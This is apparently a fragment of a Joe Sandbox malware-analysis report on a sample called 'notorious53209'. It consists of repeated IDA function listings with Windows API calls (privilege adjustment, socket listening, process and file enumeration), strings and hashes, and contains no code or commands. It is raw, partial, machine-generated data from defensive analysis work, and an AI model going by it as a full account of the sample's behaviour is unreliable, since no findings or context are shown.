                                            • Instruction Fuzzy Hash: B4518FB18112499ACF15FFA0DE928EDB7B9AF14304F6441A9E44677191EF306F29CFA0
                                            APIs
                                              • Part of subcall function 00232612: GetWindowLongW.USER32(?,000000EB), ref: 00232623
                                              • Part of subcall function 00232344: GetCursorPos.USER32(?), ref: 00232357
                                              • Part of subcall function 00232344: ScreenToClient.USER32(002F67B0,?), ref: 00232374
                                              • Part of subcall function 00232344: GetAsyncKeyState.USER32(00000001), ref: 00232399
                                              • Part of subcall function 00232344: GetAsyncKeyState.USER32(00000002), ref: 002323A7
                                            • ReleaseCapture.USER32 ref: 002BC2F0
                                            • SetWindowTextW.USER32(?,00000000), ref: 002BC39A
                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 002BC3AD
                                            • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?), ref: 002BC48F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID$pr/$pr/
                                            • API String ID: 973565025-637546867
                                            • Opcode ID: bfc96062bff4ca0afa12a89be62243360153a5eb6554a75ac39c1a02fdc5dafa
                                            • Instruction ID: 03030e41d313640bbc8af8b521ffee148fa33854b634b11241a35c5a90e65627
                                            • Opcode Fuzzy Hash: bfc96062bff4ca0afa12a89be62243360153a5eb6554a75ac39c1a02fdc5dafa
                                            • Instruction Fuzzy Hash: 15518B70214305AFD710EF24DC59FAA7BE5EB88390F10492DF9958B2A1CB71A968CF52
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ERCP$Oa$$VUUU$VUUU$VUUU$VUUU
                                            • API String ID: 0-3200402202
                                            • Opcode ID: b2e7d6b856e8c1ec2d201e9fa14b56e44ee1c8a8ea13145847b655fe532d0678
                                            • Instruction ID: e58c550866397a0cbd9ac7a904d8471169b2a39af57b50b665d8bf1a03a726f4
                                            • Opcode Fuzzy Hash: b2e7d6b856e8c1ec2d201e9fa14b56e44ee1c8a8ea13145847b655fe532d0678
                                            • Instruction Fuzzy Hash: E1A29170E2421ACBDF28DF58C9447ADB7B1BF54314F24C1AAD85AA7280E7709EA1DF50
                                            APIs
                                              • Part of subcall function 00237F41: _memmove.LIBCMT ref: 00237F82
                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0029F6AB
                                            • Sleep.KERNEL32(0000000A), ref: 0029F6DB
                                            • _wcscmp.LIBCMT ref: 0029F6EF
                                            • _wcscmp.LIBCMT ref: 0029F70A
                                            • FindNextFileW.KERNEL32(?,?), ref: 0029F7A8
                                            • FindClose.KERNEL32(00000000), ref: 0029F7BE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                            • String ID: *.*
                                            • API String ID: 713712311-438819550
                                            • Opcode ID: 5211689d7d91307b66f15487b13aaadf5811559681b8b210e31460896fc2f88c
                                            • Instruction ID: f341c12aadba730fa2994a1bac54edf09527d498e7ac36fe13d973a227bfebc4
                                            • Opcode Fuzzy Hash: 5211689d7d91307b66f15487b13aaadf5811559681b8b210e31460896fc2f88c
                                            • Instruction Fuzzy Hash: 8941627192021A9FDF95DFA4CD49AEEBBB4FF09310F144569E815E2190DB309EA4CF50
                                            APIs
                                              • Part of subcall function 00232612: GetWindowLongW.USER32(?,000000EB), ref: 00232623
                                            • GetSystemMetrics.USER32(0000000F), ref: 002BD78A
                                            • GetSystemMetrics.USER32(0000000F), ref: 002BD7AA
                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000), ref: 002BD9E5
                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 002BDA03
                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 002BDA24
                                            • ShowWindow.USER32(00000003,00000000), ref: 002BDA43
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 002BDA68
                                            • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 002BDA8B
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                                            • String ID:
                                            • API String ID: 830902736-0
                                            • Opcode ID: 68bb08469d048f83c92f87c20ae89eeb46cf9bef125c06e94bd8b08e470dea93
                                            • Instruction ID: 539eeb36a9230c07627cf460dc21a105deccee3b9d59776ecfedb7150389c940
                                            • Opcode Fuzzy Hash: 68bb08469d048f83c92f87c20ae89eeb46cf9bef125c06e94bd8b08e470dea93
                                            • Instruction Fuzzy Hash: 2CB18871610226EBDF14CF68C9C97FD7BB1FF04791F088169EC489A295EB34A9A0CB50
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _memmove
                                            • String ID:
                                            • API String ID: 4104443479-0
                                            • Opcode ID: 82ccf272db3a726066ef820d1068d10279a8beabbc6977884d6d5cdc5d644b2b
                                            • Instruction ID: a2d0342d639124f5af577674cce67a199550c7e08248a142f1a73146a32f829c
                                            • Opcode Fuzzy Hash: 82ccf272db3a726066ef820d1068d10279a8beabbc6977884d6d5cdc5d644b2b
                                            • Instruction Fuzzy Hash: C4129DB0A20619DFDF18DFA4D985AEEB3F5FF48300F104529E846A7291EB35AD25CB50
                                            APIs
                                              • Part of subcall function 00250FF6: std::exception::exception.LIBCMT ref: 0025102C
                                              • Part of subcall function 00250FF6: __CxxThrowException@8.LIBCMT ref: 00251041
                                            • _memmove.LIBCMT ref: 0028062F
                                            • _memmove.LIBCMT ref: 00280744
                                            • _memmove.LIBCMT ref: 002807EB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                            • String ID: yZ$
                                            • API String ID: 1300846289-3627473858
                                            • Opcode ID: b8c1a964ec99909db56f4e014ca42337fd7be21bd027dc2ffdf8400dca293ef4
                                            • Instruction ID: e26192dd1e5a70be74c3c334ab9e7b012f7bed7c126758ae34cd6439ce8222c4
                                            • Opcode Fuzzy Hash: b8c1a964ec99909db56f4e014ca42337fd7be21bd027dc2ffdf8400dca293ef4
                                            • Instruction Fuzzy Hash: 5E02B1B0E21215DBDF08DF64D981AAEBBB5FF44300F148069E846DB295EB31D964CF91
                                            APIs
                                              • Part of subcall function 00288CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00288D0D
                                              • Part of subcall function 00288CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00288D3A
                                              • Part of subcall function 00288CC3: GetLastError.KERNEL32 ref: 00288D47
                                            • ExitWindowsEx.USER32(?,00000000), ref: 0029549B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                            • String ID: $@$SeShutdownPrivilege
                                            • API String ID: 2234035333-194228
                                            • Opcode ID: c7dc9429d678be4eda697863d9518fc3540a3d231a09dcbea952fb229d301aad
                                            • Instruction ID: 1e8ba0fcb4ba41937afd27d5d0e20c11d401f4f327d5780bbc18442482b93de8
                                            • Opcode Fuzzy Hash: c7dc9429d678be4eda697863d9518fc3540a3d231a09dcbea952fb229d301aad
                                            • Instruction Fuzzy Hash: D7014C35775A221AEFB96E74EC4ABFA7258EB00342F201121FD06D60D2D6901CA047E0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: __itow__swprintf
                                            • String ID: Oa$
                                            • API String ID: 674341424-3294801368
                                            • Opcode ID: e404a53aae99b891b8c4deffb6629ef52674d17b5f44db40787c189ac34f5d3f
                                            • Instruction ID: 7270a5c1ccfced648794541ec8483ee9bbd67810edf8a884dfaf3ce02e83fccd
                                            • Opcode Fuzzy Hash: e404a53aae99b891b8c4deffb6629ef52674d17b5f44db40787c189ac34f5d3f
                                            • Instruction Fuzzy Hash: F7229F715283019FD728DF24C881B6FB7E4AF88714F10491DF89A97291DBB1EA64CF92
                                            APIs
                                            • socket.WS2_32(00000002,00000001,00000006), ref: 002A65EF
                                            • WSAGetLastError.WS2_32(00000000), ref: 002A65FE
                                            • bind.WS2_32(00000000,?,00000010), ref: 002A661A
                                            • listen.WS2_32(00000000,00000005), ref: 002A6629
                                            • WSAGetLastError.WS2_32(00000000), ref: 002A6643
                                            • closesocket.WS2_32(00000000), ref: 002A6657
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                            • String ID:
                                            • API String ID: 1279440585-0
                                            • Opcode ID: 861b68d51c0feb315c9b964d2c1461fef12d37b497db7b8f8568c7e5cc7bb46f
                                            • Instruction ID: c0b5698a9ec2f379de2089f58f1571a48e29cf3ccef87ef0a9ac804410c66521
                                            • Opcode Fuzzy Hash: 861b68d51c0feb315c9b964d2c1461fef12d37b497db7b8f8568c7e5cc7bb46f
                                            • Instruction Fuzzy Hash: 1B21CC746102009FCB00AF24DD8DB2EB7B9EF4A720F148269E95AA72D1CB70AD609B50
                                            APIs
                                              • Part of subcall function 00232612: GetWindowLongW.USER32(?,000000EB), ref: 00232623
                                            • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 002319FA
                                            • GetSysColor.USER32(0000000F), ref: 00231A4E
                                            • SetBkColor.GDI32(?,00000000), ref: 00231A61
                                              • Part of subcall function 00231290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 002312D8
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ColorDialogNtdllProc_$LongWindow
                                            • String ID:
                                            • API String ID: 591255283-0
                                            • Opcode ID: cb1029b329849677e74a100a52fa44282056de9d143efdcf23f73712e8b7718f
                                            • Instruction ID: d0b83d8c49af33d404d9576cfe6a0cf8ee6ea1ab327c1dcb81cba41d45b55e43
                                            • Opcode Fuzzy Hash: cb1029b329849677e74a100a52fa44282056de9d143efdcf23f73712e8b7718f
                                            • Instruction Fuzzy Hash: 7AA177F1131546BEEB29AF289C48EBF259DDB46386F24011AF402D6192CE609DB1D6B1
                                            APIs
                                              • Part of subcall function 002A80A0: inet_addr.WS2_32(00000000), ref: 002A80CB
                                            • socket.WS2_32(00000002,00000002,00000011), ref: 002A6AB1
                                            • WSAGetLastError.WS2_32(00000000), ref: 002A6ADA
                                            • bind.WS2_32(00000000,?,00000010), ref: 002A6B13
                                            • WSAGetLastError.WS2_32(00000000), ref: 002A6B20
                                            • closesocket.WS2_32(00000000), ref: 002A6B34
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                            • String ID:
                                            • API String ID: 99427753-0
                                            • Opcode ID: 294f0883d8f6f88cd436c018fa677e19291c477978677c431f6eeba2b744b4d0
                                            • Instruction ID: bbd72c185f6e7a6029084a4d604b2f20694e3f0fa03d2126b94379b96c53b98c
                                            • Opcode Fuzzy Hash: 294f0883d8f6f88cd436c018fa677e19291c477978677c431f6eeba2b744b4d0
                                            • Instruction Fuzzy Hash: D441D7B5720210AFEB10AF24DC8AF6E77A5DB05714F048158F95AAB3C2CBB45D508B91
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                            • String ID:
                                            • API String ID: 292994002-0
                                            • Opcode ID: 90d1778d260b48dc74614bd921f9c1d6f56025549f2e77b93401bf700d234f64
                                            • Instruction ID: 4e55c12481480d06a1f57bffa296680a2989c654ee7f2bbcfa429d1543f301bf
                                            • Opcode Fuzzy Hash: 90d1778d260b48dc74614bd921f9c1d6f56025549f2e77b93401bf700d234f64
                                            • Instruction Fuzzy Hash: E811E7717209216FE7212F26EC48BAFB79CEF447A1F844129F946DB241CB70D911CEA4
                                            APIs
                                            • CoInitialize.OLE32(00000000), ref: 0029C69D
                                            • CoCreateInstance.OLE32(002C2D6C,00000000,00000001,002C2BDC,?), ref: 0029C6B5
                                              • Part of subcall function 00237F41: _memmove.LIBCMT ref: 00237F82
                                            • CoUninitialize.OLE32 ref: 0029C922
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                            • String ID: .lnk
                                            • API String ID: 2683427295-24824748
                                            • Opcode ID: fe7d8553846125ed2233d92a78be5e296826cdd83b9ff25fc1b6654ef89d7c28
                                            • Instruction ID: d246330bfec1ecb7a02007b657d12810fa5ef726b23aa8990e2eb2eec01141a8
                                            • Opcode Fuzzy Hash: fe7d8553846125ed2233d92a78be5e296826cdd83b9ff25fc1b6654ef89d7c28
                                            • Instruction Fuzzy Hash: F0A12BB1224205AFD700EF54C881EABB7ECFF95704F004A6CF19697192DBB0AA59CF52
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 002AF151
                                            • Process32FirstW.KERNEL32(00000000,?), ref: 002AF15F
                                              • Part of subcall function 00237F41: _memmove.LIBCMT ref: 00237F82
                                            • Process32NextW.KERNEL32(00000000,?), ref: 002AF21F
                                            • CloseHandle.KERNEL32(00000000), ref: 002AF22E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                            • String ID:
                                            • API String ID: 2576544623-0
                                            • Opcode ID: 51ec6bc9e1a828cec2587f0b9029fdc6a23b2c854aa38c2a1e7d221079f27e0e
                                            • Instruction ID: 71ff87ed2a81bc396145fb697d8e4290a3206707f81127396378ab42735202e0
                                            • Opcode Fuzzy Hash: 51ec6bc9e1a828cec2587f0b9029fdc6a23b2c854aa38c2a1e7d221079f27e0e
                                            • Instruction Fuzzy Hash: C2518DB1524311AFD320EF24DC85A6BB7E8FF99710F10492DF49597291EB70A914CF92
                                            APIs
                                              • Part of subcall function 00232612: GetWindowLongW.USER32(?,000000EB), ref: 00232623
                                            • GetCursorPos.USER32(?), ref: 002BC7C2
                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 002BC7D7
                                            • GetCursorPos.USER32(?), ref: 002BC824
                                            • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0026BBFB,?,?,?), ref: 002BC85E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
